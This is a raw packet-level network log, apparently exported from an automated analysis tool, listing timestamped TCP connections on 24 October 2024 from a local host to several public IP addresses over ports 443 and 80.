                                        Oct 24, 2024 03:40:25.622863054 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.623153925 CEST49710443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.623172045 CEST44349710157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.623229980 CEST49710443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.623259068 CEST49710443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.636313915 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636329889 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636363029 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636383057 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636393070 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636507034 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.636507034 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.636542082 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636563063 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.636622906 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.718552113 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.739780903 CEST44349718152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:25.739840031 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.739907026 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.739944935 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.739960909 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.739995003 CEST44349718152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:25.740011930 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.740120888 CEST49718443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:25.740138054 CEST44349718152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:25.740211010 CEST49718443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:25.741358042 CEST49718443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:25.741400003 CEST44349718152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:25.753767967 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:25.753804922 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:25.753900051 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:25.754168987 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:25.754183054 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:25.755021095 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.755049944 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.755096912 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.755120993 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.755137920 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.755214930 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.755234003 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.755300999 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.765784979 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.835758924 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835793018 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835824013 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835864067 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.835874081 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835894108 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835922003 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835928917 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.835944891 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.835959911 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.836004972 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.836771011 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.836854935 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.836884022 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.836922884 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.836950064 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.836997032 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.837184906 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.837218046 CEST44349714192.229.133.221192.168.2.16
                                        Oct 24, 2024 03:40:25.837241888 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.837347031 CEST49714443192.168.2.16192.229.133.221
                                        Oct 24, 2024 03:40:25.856806993 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.856887102 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.856934071 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.856951952 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.857009888 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.872786045 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.872862101 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.873068094 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.873069048 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.873133898 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.873226881 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.873409033 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.873594999 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.873778105 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.874164104 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.874164104 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.874206066 CEST4434971318.245.31.78192.168.2.16
                                        Oct 24, 2024 03:40:25.874277115 CEST49713443192.168.2.1618.245.31.78
                                        Oct 24, 2024 03:40:25.973831892 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.973896980 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.973923922 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:25.973932028 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:25.974016905 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.090814114 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.090884924 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.090924978 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.090936899 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.090991020 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.091562986 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.092333078 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.092365026 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.092453003 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.092503071 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.092523098 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.092530966 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.092562914 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.092663050 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.093070984 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.093780041 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.093859911 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.097594976 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.097871065 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.128890038 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.129209995 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.132302046 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.132361889 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.133897066 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.134007931 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.135549068 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.135559082 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.137044907 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.137162924 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.141693115 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.141817093 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.158101082 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.174077034 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.180797100 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.180804968 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.186247110 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.186453104 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.186472893 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.186477900 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.188400030 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.188417912 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.188580990 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.189117908 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.189131975 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.189471006 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.189501047 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.190043926 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.190165043 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.191657066 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.191829920 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.191829920 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.192004919 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.192101955 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.192531109 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.192714930 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.193154097 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.193166971 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.194319963 CEST49721443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.194344044 CEST44349721157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.214265108 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:26.217119932 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.217154026 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.217236996 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.217485905 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.217492104 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.228789091 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.228897095 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.231365919 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.239356041 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.244795084 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.244807005 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.245774031 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.292826891 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.316833019 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.316849947 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.316903114 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.316967964 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.316977978 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.317064047 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.317095995 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.317136049 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.317162991 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.318412066 CEST49726443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.318423033 CEST4434972613.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.319009066 CEST49725443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.319021940 CEST4434972513.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.319545031 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.319576025 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.319634914 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.319644928 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.319659948 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.319701910 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.321119070 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.321285963 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.321348906 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.322671890 CEST49724443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.322679043 CEST4434972413.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.322988987 CEST49728443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.322993994 CEST4434972813.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.323549032 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.323889017 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.323951006 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.325848103 CEST49727443192.168.2.1613.107.246.45
                                        Oct 24, 2024 03:40:26.325853109 CEST4434972713.107.246.45192.168.2.16
                                        Oct 24, 2024 03:40:26.351339102 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.351458073 CEST49729443192.168.2.16184.28.90.27
                                        Oct 24, 2024 03:40:26.352835894 CEST49729443192.168.2.16184.28.90.27
                                        Oct 24, 2024 03:40:26.352889061 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.353395939 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.354451895 CEST49729443192.168.2.16184.28.90.27
                                        Oct 24, 2024 03:40:26.395365000 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.516515970 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:26.598550081 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.598644972 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.598710060 CEST49729443192.168.2.16184.28.90.27
                                        Oct 24, 2024 03:40:26.599663019 CEST49729443192.168.2.16184.28.90.27
                                        Oct 24, 2024 03:40:26.599704027 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.599734068 CEST49729443192.168.2.16184.28.90.27
                                        Oct 24, 2024 03:40:26.599750042 CEST44349729184.28.90.27192.168.2.16
                                        Oct 24, 2024 03:40:26.780452967 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:26.780742884 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:26.780759096 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:26.784411907 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:26.784497976 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:26.784858942 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:26.785027981 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:26.785034895 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:26.831331968 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:26.832753897 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:26.832767010 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:26.880770922 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:26.897134066 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.900837898 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.900849104 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.901341915 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.901753902 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.901849985 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.901901960 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:26.943340063 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:26.944777012 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.014010906 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:27.014151096 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:27.014239073 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:27.014257908 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:27.014295101 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:27.015201092 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:27.015211105 CEST44349732152.199.21.175192.168.2.16
                                        Oct 24, 2024 03:40:27.015234947 CEST49732443192.168.2.16152.199.21.175
                                        Oct 24, 2024 03:40:27.064734936 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.120820999 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.122368097 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:27.182344913 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.182372093 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.182416916 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.182436943 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.182471991 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.182502985 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.182548046 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.182657003 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.182657003 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.182657003 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.299685001 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.299710035 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.299752951 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.299839020 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.299861908 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.299915075 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.377784967 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:27.417337894 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.417387962 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.417440891 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.417458057 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.417488098 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.417516947 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.534717083 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.534750938 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.534821033 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.534838915 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.534888029 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.534910917 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.653115034 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.653140068 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.653192043 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.653207064 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.653249979 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.770710945 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.770766020 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.770796061 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.770811081 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.770843029 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.770857096 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.813461065 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.813550949 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.813565016 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.813589096 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.813605070 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:27.813648939 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.813673019 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.813930988 CEST49734443192.168.2.16157.230.134.73
                                        Oct 24, 2024 03:40:27.813954115 CEST44349734157.230.134.73192.168.2.16
                                        Oct 24, 2024 03:40:28.334764957 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:30.680071115 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:30.743927956 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:30.983829975 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:31.591558933 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:31.610208035 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:31.610255003 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:31.610352993 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:31.611596107 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:31.611619949 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:32.738846064 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:32.738976002 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:32.741796970 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:32.741825104 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:32.742352009 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:32.785785913 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:32.793669939 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:32.801794052 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:32.835392952 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.166867971 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.166940928 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.166960955 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.167018890 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.167051077 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.167081118 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.167118073 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.167143106 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.167143106 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.167181015 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.253254890 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.253379107 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.253417015 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.253643990 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.253669977 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.253685951 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:33.254014015 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.254103899 CEST443497384.245.163.56192.168.2.16
                                        Oct 24, 2024 03:40:33.254156113 CEST49738443192.168.2.164.245.163.56
                                        Oct 24, 2024 03:40:35.155745983 CEST44349712142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:40:35.155839920 CEST44349712142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:40:35.156208992 CEST49712443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:40:35.213927031 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:35.549864054 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:35.726098061 CEST49712443192.168.2.16142.250.185.68
                                        Oct 24, 2024 03:40:35.726162910 CEST44349712142.250.185.68192.168.2.16
                                        Oct 24, 2024 03:40:36.987051010 CEST49673443192.168.2.16204.79.197.203
                                        Oct 24, 2024 03:40:40.022880077 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:40:45.164868116 CEST49678443192.168.2.1620.189.173.10
                                        Oct 24, 2024 03:40:49.634732962 CEST4968080192.168.2.16192.229.211.108
                                        Oct 24, 2024 03:41:09.537647009 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:09.537693977 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:09.537842989 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:09.538168907 CEST49739443192.168.2.1620.12.23.50
                                        Oct 24, 2024 03:41:09.538180113 CEST4434973920.12.23.50192.168.2.16
                                        Oct 24, 2024 03:41:10.394601107 CEST4434973920.12.23.50192.168.2.16
